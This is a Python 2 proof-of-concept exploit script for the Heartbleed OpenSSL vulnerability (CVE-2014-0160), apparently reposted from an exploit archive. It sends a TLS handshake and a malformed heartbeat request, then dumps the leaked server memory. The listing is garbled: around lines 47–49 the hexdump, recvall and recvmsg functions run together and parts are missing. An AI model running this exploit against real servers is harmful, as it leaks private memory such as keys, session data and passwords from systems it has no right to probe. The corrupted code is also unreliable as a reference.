SOURCE EXPLOIT - Heartbleed

1. #!/usr/bin/python
2.  
3. # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
4. # The author disclaims copyright to this source code.
5.  
6. import sys
7. import struct
8. import socket
9. import time
10. import select
11. import re
12. from optparse import OptionParser
13.  
14. options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
15. options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
16.  
17. def h2bin(x):
18.     return x.replace(' ', '').replace('\n', '').decode('hex')
19.  
20. hello = h2bin('''
21. 16 03 02 00  dc 01 00 00 d8 03 02 53
22. 43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
23. bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
24. 00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
25. 00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
26. c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
27. c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
28. c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
29. c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
30. 00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
31. 03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
32. 00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
33. 00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
34. 00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
35. 00 0f 00 01 01                                
36. ''')
37.  
38. hb = h2bin('''
39. 18 03 02 00 03
40. 01 40 00
41. ''')
42.  
43. def hexdump(s):
44.     for b in xrange(0, len(s), 16):
45.         lin = [c for c in s[b : b + 16]]
46.         hxdat = ' '.join('%02X' % ord(c) for c in lin)
47.         pdat = ''.join((c if 32 <= ord(c)  0:
48.         rtime = endtime - time.time()
49.         if rtime BHH', hdr)
50.    pay = recvall(s, ln, 10)
51.    if pay is None:
52.        print 'Unexpected EOF receiving record payload - server closed connection'
53.        return None, None, None
54.    print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
55.    return typ, ver, pay
56.  
57. def hit_hb(s):
58.    s.send(hb)
59.    while True:
60.        typ, ver, pay = recvmsg(s)
61.        if typ is None:
62.            print 'No heartbeat response received, server likely not vulnerable'
63.            return False
64.  
65.        if typ == 24:
66.            print 'Received heartbeat response:'
67.            hexdump(pay)
68.            if len(pay) > 3:
69.                print 'WARNING: server returned more data than it should - server is vulnerable!'
70.            else:
71.                print 'Server processed malformed heartbeat, but did not return any extra data.'
72.            return True
73.  
74.        if typ == 21:
75.            print 'Received alert:'
76.            hexdump(pay)
77.            print 'Server returned error, likely not vulnerable'
78.            return False
79.  
80. def main():
81.    opts, args = options.parse_args()
82.    if len(args) < 1:
83.        options.print_help()
84.        return
85.  
86.    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
87.    print 'Connecting...'
88.    sys.stdout.flush()
89.    s.connect((args[0], opts.port))
90.    print 'Sending Client Hello...'
91.    sys.stdout.flush()
92.    s.send(hello)
93.    print 'Waiting for Server Hello...'
94.    sys.stdout.flush()
95.    while True:
96.        typ, ver, pay = recvmsg(s)
97.        if typ == None:
98.            print 'Server closed connection without sending Server Hello.'
99.            return
100.        # Look for server hello done message.
101.        if typ == 22 and ord(pay[0]) == 0x0E:
102.            break
103.  
104.    print 'Sending heartbeat request...'
105.    sys.stdout.flush()
106.    s.send(hb)
107.    hit_hb(s)
108.  
109. if __name__ == '__main__':
110.    main()
111.  
112. # 392164AAAD9A3A12   1337day.com [2014-04-09]   F6385B09958196DD #